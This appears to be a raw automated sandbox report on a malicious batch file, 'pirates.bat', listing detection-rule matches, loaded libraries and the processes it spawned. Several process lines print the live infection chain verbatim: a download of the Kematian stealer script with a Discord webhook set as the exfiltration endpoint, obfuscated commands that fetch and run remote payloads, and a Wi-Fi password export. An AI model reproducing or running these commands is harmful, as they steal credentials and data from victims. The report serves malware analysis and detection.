            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_000002A873FFC88048_2_000002A873FFC880
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_000002A873FCE28048_2_000002A873FCE280
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_000002A873FBDA0048_2_000002A873FBDA00
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_000002A873FD91E048_2_000002A873FD91E0
            Source: amsi64_7296.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: amsi64_7296.amsi.csv, type: OTHERMatched rule: MALWARE_Win_PWSH_PoshWiFiStealer author = ditekSHen, description = Detects PowerShell PoshWiFiStealer
            Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 00000030.00000002.2641864548.000002A8730B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 00000030.00000002.2414199980.000002A86A80A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 00000014.00000002.1765711117.000001EC482E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: 00000014.00000002.1765711117.000001EC47062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTRMatched rule: MALWARE_Win_PWSH_PoshWiFiStealer author = ditekSHen, description = Detects PowerShell PoshWiFiStealer
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winBAT@69/65@7/5
            Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\kdotkccaDE.batJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4348:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3272:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k315zlmt.dfr.ps1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\7b0b5458a1aa2ee98f96435fa1e656ba5cc359b8239df23b0fd0c5d774ba2a20AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript //nologo temp.vbs
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\System32\cscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: powershell.exe, 00000030.00000002.2770545725.000002A8743F3000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000030.00000002.2690768710.000002A873850000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: powershell.exe, 00000030.00000002.2770545725.000002A8743F3000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000030.00000002.2690768710.000002A873850000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: powershell.exe, 00000030.00000002.2770545725.000002A8743F3000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000030.00000002.2690768710.000002A873850000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: powershell.exe, 00000030.00000002.2770545725.000002A8743F3000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000030.00000002.2690768710.000002A873850000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: powershell.exe, 00000030.00000002.2770545725.000002A8743F3000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000030.00000002.2690768710.000002A873850000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
            Source: powershell.exe, 00000030.00000002.2770545725.000002A8743F3000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000030.00000002.2690768710.000002A873850000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: powershell.exe, 00000030.00000002.2770545725.000002A8743F3000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000030.00000002.2690768710.000002A873850000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript //nologo temp.vbs
            Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -c "Write-Host -NoNewLine $null"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net session
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC' | Out-File -FilePath 'kematian.ps1' -Encoding ASCII"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\doskey.exe doskey CALL=SHIFT
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s kematian.ps1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$bytes = [System.IO.File]::ReadAllBytes('C:\Users\user\Desktop\pirates.bat') ; if (($bytes[0] -ne 0xFF) -or ($bytes[1] -ne 0xFE)) { Write-Host 'The first 3 bytes of the file are not FF FE 0A.' ; taskkill /F /IM cmd.exe }"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe wscript /b
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -noprofile -executionpolicy bypass -WindowStyle hidden -file kematian.ps1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user\AppData\Local\Temp\wifi key=clear
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1'))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4A61.tmp" "c:\Users\user\AppData\Local\Temp\hvw5rqqp\CSC90E3CD70A79D45AA9723BEFA972FDA5B.TMP"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1'))
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript //nologo temp.vbsJump to behavior
            Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" "Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "C:\Users\user\Desktop\pirates.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "C:\Users\user\Desktop\pirates.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "C:\Users\user\Desktop\pirates.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -c "Write-Host -NoNewLine $null" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net sessionJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC' | Out-File -FilePath 'kematian.ps1' -Encoding ASCII" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\doskey.exe doskey CALL=SHIFTJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s kematian.ps1Jump to behavior
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 sessionJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user\AppData\Local\Temp\wifi key=clearJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1')) Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1')) Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4A61.tmp" "c:\Users\user\AppData\Local\Temp\hvw5rqqp\CSC90E3CD70A79D45AA9723BEFA972FDA5B.TMP"
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
            Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
            Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\net1.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\System32\net1.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dllJump to behavior
            Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
